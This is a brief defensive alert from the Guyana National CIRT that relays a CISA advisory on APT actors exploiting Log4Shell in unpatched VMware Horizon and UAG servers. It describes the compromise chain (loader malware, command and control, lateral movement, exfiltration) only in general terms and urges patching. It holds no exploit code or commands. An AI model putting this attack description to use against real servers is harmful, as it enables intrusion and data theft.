The Cybersecurity and Infrastructure Security Agency (CISA) and the United States Coast Guard Cyber Command (CGCYBER) issued a joint Cybersecurity Advisory on June 23, 2022. (CSA). This was released to alert network defenders to Advanced Persistent Threat (APT) actors” continued exploitation of CVE-2021-44228 (Log4Shell) within unpatched VMware Horizon and Unified Access Gateway (UAG) servers.
Log4Shell has been exploited by multiple threat actor groups on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors installed loader malware on compromised systems that contained embedded executables that allowed remote command and control (C2). These Cyber attackers are able to move laterally inside the network and collect and exfiltrate sensitive data in one confirmed compromise.
How it works
The CVE-2021-44228 vulnerability allows malicious users to execute arbitrary code on a machine or pod by exploiting a flaw in the log4j library, this is done by sending a specially crafted request to a vulnerable system, causing the system to execute arbitrary code. The request grants malicious actors” complete control of the affected system.
The Guyana National CIRT encourages organizations with vulnerable VMware Horizon and UAG systems to update all affected systems to the latest version, Utilize TTPs and IOCs to examine/remediate affected and associated systems.
The Guyana National CIRT recommends that users and administrations review this alert and apply it where necessary.
PDF Download: Log4Shell is still being exploited.pdf
APT actors continue exploitation of Log4Shell in VMware products (28th June 2022). Retrieved from Canadian Centre for Cyber Security.
Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems | CISA. (2022, June 23). Retrieved from Cybersecurity and Infrastructure Security Agency (CISA).